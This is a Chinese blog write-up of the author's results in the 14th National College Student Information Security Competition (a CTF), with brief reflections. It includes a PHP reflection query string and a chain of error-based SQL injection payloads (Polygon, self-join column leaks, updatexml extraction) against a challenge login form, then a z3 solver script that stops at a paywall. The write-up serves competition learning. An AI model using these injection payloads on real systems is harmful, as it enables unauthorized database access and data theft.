本文记录了作者参加第14届全国大学生信息安全竞赛的体验,描述了比赛的难度和赛制变化,以及自身在web、re、cry等方向的解题情况。尽管遇到了挑战,但作者从中认识到自身的不足,计划加强学习,来年再战。
第14届全国大学生信息安全竞赛-1sNone
ps:这次比赛题目tnl,菜dog全程懵逼,三套题,懵到底,呜呜呜,看大师虎们乱杀,自己就做出了几道。还是写个wp记录一下
这次比赛难度比上一届又大了,而且赛制也变化,有点不适应。不过主要还是能力不到位,队内各个方向的同学学的还是比较少,很多题目有思路但做不出来,还是练的少,见的少了。继续学叭,来年再战。
web
easy_source
?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment
easy_sql
打开靶场是个登陆界面
经测试发现存在报错注入
而且过滤了union关键词
根据http://www.wupco.cn/?p=4117可写出payload
POST:
uname=1')and(Polygon(id))#
//可以爆出当前使用的库名 表名
//盲猜存在flag表
POST:
uname=1')and(select * from (select * from flag as a join flag as b using(id)) as c)#
//得出另一个列名 no
//继续
POST:
uname=1')and(select * from (select * from flag as a join flag as b using(id,no)) as c)#
//得出列名 6dfac239-7111-4c7e-bdb7-91816d6259f3
//爆字段
uname=1')and(updatexml(1,concat(0x7e,(select `6dfac239-7111-4c7e-bdb7-91816d6259f3` from `flag`),0x7e),1))#
//截取
uname=1')and(updatexml(1,concat(0x7e,substr((select `6dfac239-7111-4c7e-bdb7-91816d6259f3` from `flag`),30,20),0x7e),1))#
//相结合即得flag
re
baby_bc
from z3 import *
from hashlib import md5
row = [[0x00, 0x00, 0x00, 0x01],[0x01, 0x00, 0x00, 0x00], [0x02, 0x00, 0x00, 0x01], [0x00, 0x00, 0x00, 0x00], [0x01, 0x00, 0x01, 0x00]]
col = [[0x00, 0x00, 0x02, 0x00,0x02], [0x00, 0x00, 0x00, 0x00, 0x00], [0x00, 0x00, 0x00, 0x01, 0x00], [0x00, 0x01, 0x00, 0x00, 0x01]]
s = Solver()
map = [[Int("x%d%d"%(i, j)) for i in range(5)] for j in range(5)]
print(map)
s.add(map[2][
最低0.47元/天 解锁文章
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
